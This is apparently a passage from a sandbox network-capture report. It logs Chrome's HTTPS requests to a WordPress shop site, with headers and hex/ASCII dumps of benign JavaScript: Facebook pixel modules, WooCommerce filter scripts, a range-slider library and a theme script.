                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                          Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21
                                                                                                          Data Ascii: ),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!
                                                                                                          2024-12-12 11:58:36 UTC1703INData Raw: 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                          Data Ascii: ()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Obje
                                                                                                          2024-12-12 11:58:36 UTC14681INData Raw: 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63
                                                                                                          Data Ascii: y:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEnc
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 76 61 72 20 6a
                                                                                                          Data Ascii: b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET");f.getFbeventsModules("signalsFBEventsSendXHR");var j
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 6e 75 6d 62 65 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e
                                                                                                          Data Ascii: typeof a!=="string")throw new g();return a}}function q(){return function(a){if(typeof a!=="string"&&typeof a!=="number")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"||Array.isArray(a)||a==n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          125192.168.2.2449920147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC741OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:36 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:36 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1167
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:36 UTC1167INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 73 65 6c 65 63 74 73 28 29 20 7b 0a 20 20 20 20 0a 20 20 20 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 63 68 6f 73 65 6e 27 29 20 7b 0a 09 6a 51 75 65 72 79 28 22 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 2c 20 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 70 72 69 63 65 5f 66 69 6c 74 65 72 5f 64 72 6f 70 64 6f 77 6e 22 29 2e 63 68 6f 73 65 6e 28 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 73 65 6c 65 63 74 77 6f 6f 27 29 20 7b 0a 09 6a 51 75 65 72 79 28 22 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 2c 20 73 65 6c 65 63 74 2e 77 6f 6f 66
                                                                                                          Data Ascii: "use strict";function woof_init_selects() { if (woof_select_type == 'chosen') {jQuery("select.woof_select, select.woof_price_filter_dropdown").chosen(); } else if (woof_select_type == 'selectwoo') {jQuery("select.woof_select, select.woof


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          126192.168.2.2449921147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC742OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:36 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:36 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2047
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:36 UTC2047INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 6d 73 65 6c 65 63 74 73 28 29 20 7b 0a 0a 20 20 20 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 63 68 6f 73 65 6e 27 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 6d 73 65 6c 65 63 74 27 29 2e 63 68 6f 73 65 6e 28 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 73 65 6c 65 63 74 77 6f 6f 27 29 20 7b 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 6d 73 65 6c 65 63 74 27 29 2e 73 65 6c 65 63 74 57 6f 6f 28 29 3b 0a 20
                                                                                                          Data Ascii: "use strict";function woof_init_mselects() { if (woof_select_type == 'chosen') { jQuery('select.woof_mselect').chosen(); } else if (woof_select_type == 'selectwoo') { try { jQuery('select.woof_mselect').selectWoo();


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          127192.168.2.2449922147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC586OUTGET /wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangeSlider.min.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:36 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:36 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 41171
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:37 UTC16384INData Raw: 2f 2f 20 49 6f 6e 2e 52 61 6e 67 65 53 6c 69 64 65 72 2c 20 32 2e 33 2e 31 2c 20 c2 a9 20 44 65 6e 69 73 20 49 6e 65 73 68 69 6e 2c 20 32 30 31 30 20 2d 20 32 30 31 39 2c 20 49 6f 6e 44 65 6e 2e 63 6f 6d 2c 20 42 75 69 6c 64 20 64 61 74 65 3a 20 32 30 31 39 2d 31 32 2d 31 39 20 31 36 3a 35 36 3a 34 34 0a 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 26 26 6a 51 75 65 72 79 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 7c 7c 21 64 65 66 69 6e 65 2e 61 6d 64 3f 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 26 26 6a 51 75 65 72 79 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 69 28 6a 51
                                                                                                          Data Ascii: // Ion.RangeSlider, 2.3.1, Denis Ineshin, 2010 - 2019, IonDen.com, Build date: 2019-12-19 16:56:44!function(i){"undefined"!=typeof jQuery&&jQuery||"function"!=typeof define||!define.amd?"undefined"!=typeof jQuery&&jQuery||"object"!=typeof exports?i(jQ
                                                                                                          2024-12-12 11:58:37 UTC16384INData Raw: 6e 74 28 29 29 2c 74 68 69 73 2e 63 6f 6f 72 64 73 2e 77 5f 72 73 29 29 7b 74 68 69 73 2e 63 61 6c 63 50 6f 69 6e 74 65 72 50 65 72 63 65 6e 74 28 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 58 28 29 3b 73 77 69 74 63 68 28 22 62 6f 74 68 22 3d 3d 3d 74 68 69 73 2e 74 61 72 67 65 74 26 26 28 74 68 69 73 2e 63 6f 6f 72 64 73 2e 70 5f 67 61 70 3d 30 2c 69 3d 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 58 28 29 29 2c 22 63 6c 69 63 6b 22 3d 3d 3d 74 68 69 73 2e 74 61 72 67 65 74 26 26 28 74 68 69 73 2e 63 6f 6f 72 64 73 2e 70 5f 67 61 70 3d 74 68 69 73 2e 63 6f 6f 72 64 73 2e 70 5f 68 61 6e 64 6c 65 2f 32 2c 69 3d 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 58 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64 72 61 67 5f 69 6e 74 65 72 76
                                                                                                          Data Ascii: nt()),this.coords.w_rs)){this.calcPointerPercent();var i=this.getHandleX();switch("both"===this.target&&(this.coords.p_gap=0,i=this.getHandleX()),"click"===this.target&&(this.coords.p_gap=this.coords.p_handle/2,i=this.getHandleX(),this.options.drag_interv
                                                                                                          2024-12-12 11:58:37 UTC8403INData Raw: 6e 29 2c 65 3d 2b 28 65 2b 61 29 2e 74 6f 46 69 78 65 64 28 6e 29 29 3b 76 61 72 20 63 2c 6c 3d 28 65 2d 6f 29 2f 31 30 30 2a 74 2b 6f 2c 5f 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 65 70 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 3d 5f 3f 2b 6c 2e 74 6f 46 69 78 65 64 28 5f 2e 6c 65 6e 67 74 68 29 3a 28 6c 2f 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 65 70 2c 2b 28 6c 2a 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 65 70 29 2e 74 6f 46 69 78 65 64 28 30 29 29 2c 61 26 26 28 6c 2d 3d 61 29 2c 28 63 3d 5f 3f 2b 6c 2e 74 6f 46 69 78 65 64 28 5f 2e 6c 65 6e 67 74 68 29 3a 74 68 69 73 2e 74 6f 46 69 78 65 64 28 6c 29 29 3c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6d 69 6e 3f 63 3d 74 68
                                                                                                          Data Ascii: n),e=+(e+a).toFixed(n));var c,l=(e-o)/100*t+o,_=this.options.step.toString().split(".")[1];return l=_?+l.toFixed(_.length):(l/=this.options.step,+(l*=this.options.step).toFixed(0)),a&&(l-=a),(c=_?+l.toFixed(_.length):this.toFixed(l))<this.options.min?c=th


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          128192.168.2.2449923147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC536OUTGET /wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:36 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:36 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:09 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 47022
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 20 20 20 20 76 61 72 20 24 77 69 6e 64 6f 77 20 20 20 3d 20 24 28 20 77 69 6e 64 6f 77 20 29 2c 0a 20 20 20 20 20 20 20 20 24 64 6f 63 75 6d 65 6e 74 20 3d 20 24 28 20 64 6f 63 75 6d 65 6e 74 20 29 2c 0a 20 20 20 20 20 20 20 20 24 62 6f 64 79 20 20 20 20 20 3d 20 24 28 20 27 62 6f 64 79 27 20 29 3b 0a 20 20 20 20 76 61 72 20 43 49 45 4e 41 20 3d 20 43 49 45 4e 41 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 43 49 45 4e 41 2e 69 6e 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 74 20 3d 20 74 68 69 73 3b 0a 20 20 20 20 20 20 20 20 5f 74 2e 6f 66 66 43 61 6e 76 61 73 28 29 3b 0a 20 20 20 20 20 20 20 20 5f 74 2e 73 74
                                                                                                          Data Ascii: (function ($) { "use strict"; var $window = $( window ), $document = $( document ), $body = $( 'body' ); var CIENA = CIENA || {}; CIENA.init = function () { var _t = this; _t.offCanvas(); _t.st
                                                                                                          2024-12-12 11:58:37 UTC16384INData Raw: 5f 66 6f 72 6d 5f 77 72 61 70 70 65 72 2e 63 6c 6f 73 65 73 74 28 27 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 72 65 73 75 6c 74 5f 73 65 61 72 63 68 5f 61 63 74 69 76 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 20 20 20 20 43 49 45 4e 41 2e 46 69 6c 6c 74 65 72 42 74 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 24 28 27 2e 63 69 65 6e 61 2d 66 69 6c 74 65 72 2d 62 74 6e 27 29 2e 6c 65 6e 67 74 68 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6c 74 65 72 5f 62 74 6e 20 3d 20 24 28 27 2e 63 69 65 6e 61 2d 66 69 6c 74 65 72 2d 62 74 6e 27 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: _form_wrapper.closest('.modal-content').removeClass('result_search_active'); } }); }; CIENA.FillterBtn = function() { if ($('.ciena-filter-btn').length){ var filter_btn = $('.ciena-filter-btn'),
                                                                                                          2024-12-12 11:58:37 UTC14254INData Raw: 69 73 74 5f 63 6f 75 6e 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 24 62 6f 64 79 2e 6f 6e 28 27 72 65 6d 6f 76 65 64 5f 66 72 6f 6d 5f 77 69 73 68 6c 69 73 74 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 6c 2c 20 65 6c 5f 77 72 61 70 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 70 64 61 74 65 5f 77 69 73 68 6c 69 73 74 5f 63 6f 75 6e 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 24 62 6f 64 79 2e 6f 6e 28 27 74 69 6e 76 77 6c 5f 77 69 73 68 6c 69 73 74 5f 61 64 64 65 64 5f 73 74 61 74 75 73 27 2c 66 75 6e 63 74 69 6f 6e 20 28 65 6c 2c 20 65 6c 5f 77 72 61 70 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 70 64 61 74 65 5f 77 69 73 68 6c 69 73 74 5f 63 6f 75 6e 74 28 29 3b 0a 20 20 20 20
                                                                                                          Data Ascii: ist_count(); }); $body.on('removed_from_wishlist', function (el, el_wrap) { update_wishlist_count(); }); $body.on('tinvwl_wishlist_added_status',function (el, el_wrap) { update_wishlist_count();


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          129192.168.2.2449924147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:36 UTC751OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_featured.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:37 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:37 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1665
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
